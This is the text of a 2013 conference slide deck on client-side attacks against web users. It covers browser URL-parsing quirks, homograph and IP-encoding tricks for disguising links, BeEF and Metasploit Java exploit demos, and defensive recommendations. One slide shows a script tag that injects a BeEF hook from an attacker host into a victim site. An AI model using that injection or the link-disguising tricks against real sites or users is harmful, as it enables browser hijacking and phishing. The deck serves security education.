Embed Size (px)
DESCRIPTION
This presentation was prepared specially for IT Weekend Lviv, October 2013 and cover Client Side Attacks against web users.
Citation preview
Welcome to the world of
HACKINGby Nazar Tymoshyk, R&D team, SoftServe& Bohdan Serednyskyj, R&D team, SoftServe
What this topic is about?
Як це бачать друзі Що думає мама Як сприймає суспільство
Як це бачить влада Як уявляю собі це я А що є насправді
This is more educational topic, not motivational
Amateurs hacks - systems, Professionals hacks - PEOPLE
Client Side Attacks
About me
Feel free to ask me anything :)
Best SoftServe Team – R&D
Security TeamNazar TymoshykCEH, HP FSTS, CIW WSS, Cisco SS, ZSS, CLE, DCTS, DCATS,NAI,CLP,NLTS,CNA,NCLA,MCTS
Bohdan SerednytskyiCEH, MSTC Security, ZSS
Certifications
Ph.D in Security
Identity & Security
SoftServe experts are certified in HP Fortify
Security Testing solution
Time for fun. Just relax
Target – web users
Everybody knows that Government is spying us
Every day we are getting suspicious emails
And online promotions
Yes!!! Just click link below
Quick Quiz
1. Will this URL work in IE?
http:\\example.com\
2. What page will be opened in Firefox browser after entering this URL?
http://example.com\@coredump.cx/
1. Yes. IE and most browsers parse “\” as “/” for usability reasons.
2. In Firefox, that URL will take the user to coredump.cx, because example.com\ will be interpreted as a valid value for the login field. In almost all other browsers, “\” will be interpreted as a path delimiter, and the user will land on example.com instead.
Answers
Now try it by yourself and answer what you get?!
Tricky URLs
For all browsershttp://example.com&gibberish=1234@167772161/
And http://example.com\@coredump.cx/ is http://example.com/ for all…
This is it!
For all browsershttp://example.com&gibberish=1234@167772161/
And http://example.com\@coredump.cx/ is http://example.com/ for all…
is http://10.0.0.1/
…but for Firefox it’s http://coredump.cx/
Cheatershttp://example.com/.wholesome-domain.com/
This only looks like a real Slash.Read: Evgeniy Gabrilovich and Alex Gontmakher “The Homograph Attack”
Server addresses
•http://127.0.0.1/ This is a canonical representation of an IPv4 address.
•http://0x7f.1/ This is a representation of the same address that uses a hexadecimal number to represent the first octet and concatenates all the remaining octets into a single decimal value.
•http://017700000001/ The same address is denoted using a 0-prefixed octal value, with all octets concatenated into a single 32-bit integer.
Now attention
Recommended Book
DEMO I
BeeF – Browser exploitation framework
Our victim site <script src=http://attackersite/hook.js></script>
http://192.168.241.240:8882
Now about Java
Everybody likes Java
Butthere is a small problem
in 2013
Java exploits in Metasploit 4
Status - Excellent
JVM vulnerabilities
DEMO II
Social Engineering TOolkit
Consequences
• Stolen Developer Cloud access Certificates• Malware and Spyware on PC and mobile• Key loggers • Money Lost – Paypal, webmoney, etc.• Email – recovery and steal accounts• SHAME!
Recommendations
• Up to date JAVA and all other software• Antivirus – Kasper rocks!• Encrypted keys to infrastructure• 2 factor authentication everywhere
(email first)• Verify yourself and your browser on …
•Attention
OWASP Secure Coding Guide
Apache Shiro
OWASP WebGoat, DVWA - Train yourself in Security
Hope you like it!
